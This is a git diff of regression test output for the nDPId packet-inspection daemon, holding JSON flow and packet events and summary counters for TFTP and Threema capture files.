+00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":103,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":25058,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":946737844630} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946737844630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946737844630,"pkt":"eCSvPj0DAFBWn8+KCABFAAAuYudAAEARdJqsHAVbrBwFqq5KAEUAGkfgAAJ6ei5iaW4AbmV0YXNjaWkA"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844631,"flow_last_seen":946737844631,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":946737844631,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946737844631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":946737844631,"pkt":"AFBWn8+KeCSvPj0DCABFAAAgqt8AAEARbLCsHAWqrBwFW\/JqrkoADPveAAQAAA=="} +01206{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946737844632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946737844632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYuhAAEARcqesHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} +01206{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946737844632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946737844632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYulAAEARcqasHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946737844631,"flow_last_seen":946737844632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946737844631,"flow_last_seen":946737844632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":107,"total-skipped-flows":0,"total-l4-payload-len":26116,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":946737844632} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 104/104 +~~ packets captured/processed: 107/107 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 26069 bytes -~~ total detected protocols..: 4 -~~ total active/idle flows...: 4/4 +~~ total layer4 data length..: 26116 bytes +~~ total detected protocols..: 7 +~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875639 bytes -~~ total memory freed........: 5875639 bytes -~~ total allocations/frees...: 118230/118230 +~~ total memory allocated....: 6012658 bytes +~~ total memory freed........: 6012658 bytes +~~ total allocations/frees...: 121009/121009 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 444 chars -~~ json string max len.......: 1213 chars -~~ json string avg len.......: 827 chars +~~ json string min len.......: 442 chars +~~ json string max len.......: 1211 chars +~~ json string avg len.......: 825 chars diff --git a/test/results/threema.pcap.out b/test/results/threema.pcap.out new file mode 100644 index 000000000..5631fcbb9 --- /dev/null +++ b/test/results/threema.pcap.out @@ -0,0 +1,57 @@ +00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"threema.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655301424082} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301424082,"flow_last_seen":1655301424082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301424082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655301424082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301424082,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sOJAAD8GIgbAqAJkuVjsbsR6FGaFcI59AAAAAKAC\/\/+zrwAAAgQFtAQCCAoADj6fAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655301424108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301424108,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxHpp4+23hXCOfqAS\/\/9\/CwAAAgQFrAEDAwYEAggK7ZTvbAAOPp8="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655301424111,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301424111,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sONAAD8GIg3AqAJkuVjsbsR6FGaFcI5+aePtuIAQAVescAAAAQEICgAOPqbtlO9s"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301424082,"flow_last_seen":1655301470737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":817,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1655301470737,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301591783,"flow_last_seen":1655301591783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301591783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655301591783,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301591783,"pkt":"eJS0JASgYDjgxTWgCABFAAA89dRAAD8G3RPAqAJkuVjsbsU0FGbdvRewAAAAAKAC\/\/8tsAAAAgQFtAQCCAoADuJkAAAAAAEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655301591807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301591807,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxTS\/ZrJg3b0XsaAS\/\/\/aLAAAAgQFrAEDAwYEAggKjwRSsAAO4mQ="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655301591810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301591810,"pkt":"eJS0JASgYDjgxTWgCABFAAA09dVAAD8G3RrAqAJkuVjsbsU0FGbdvRexv2ayYYAQAVcHkgAAAQEICgAO4muPBFKw"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301591783,"flow_last_seen":1655301594185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":825,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1655301594185,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301676958,"flow_last_seen":1655301676958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301676958,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655301676958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301676958,"pkt":"eJS0JASgYDjgxTWgCABFAAA8OhtAAD8GmM3AqAJkuVjsbsVEFGa+1hz1AAAAAKAC\/\/8CuAAAAgQFtAQCCAoADybuAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655301676985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301676985,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxUQ+t0LhvtYc9qAS\/\/88cwAAAgQFrAEDAwYEAggKDbs26gAPJu4="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655301676988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301676988,"pkt":"eJS0JASgYDjgxTWgCABFAAA0OhxAAD8GmNTAqAJkuVjsbsVEFGa+1hz2PrdC4oAQAVdp2AAAAQEICgAPJvUNuzbq"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301676958,"flow_last_seen":1655301678700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":681,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655301678700,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","packets-captured":43,"packets-processed":42,"total-skipped-flows":0,"total-l4-payload-len":4306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1655304039977} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655304039977,"flow_last_seen":1655304039977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655304039977,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655304039977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655304039977,"pkt":"eJS0JASgYDjgxTWgCABFAAA8D\/ZAAD8GwvLAqAJkuVjsbsW6FGZ91skoAAAAAKAC\/\/\/3HAAAAgQFtAQCCAoAEMbeAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655304040001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655304040001,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxbp03BGqfdbJKaAS\/\/+2UQAAAgQFrAEDAwYEAggKO2t+0gAQxt4="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655304040004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655304040004,"pkt":"eJS0JASgYDjgxTWgCABFAAA0D\/dAAD8GwvnAqAJkuVjsbsW6FGZ91skpdNwRq4AQAVfjtgAAAQEICgAQxuU7a37S"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655304039977,"flow_last_seen":1655304040312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1655304040312,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1655301676958,"flow_last_seen":1655301738438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":681,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1655304045367,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":5258,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1655306704436} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655306704436,"flow_last_seen":1655306704436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655306704436,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655306704436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655306704436,"pkt":"eJS0JASgYDjgxTWgCABFAAA8W4NAAD8Gd2XAqAJkuVjsbsYeFGbGZSToAAAAAKAC\/\/+Z2wAAAgQFtAQCCAoAEn9rAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655306704460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655306704460,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxh4tYXzzxmUk6aAS\/\/9+tQAAAgQFrAEDAwYEAggKd2P5ZgASf2s="} 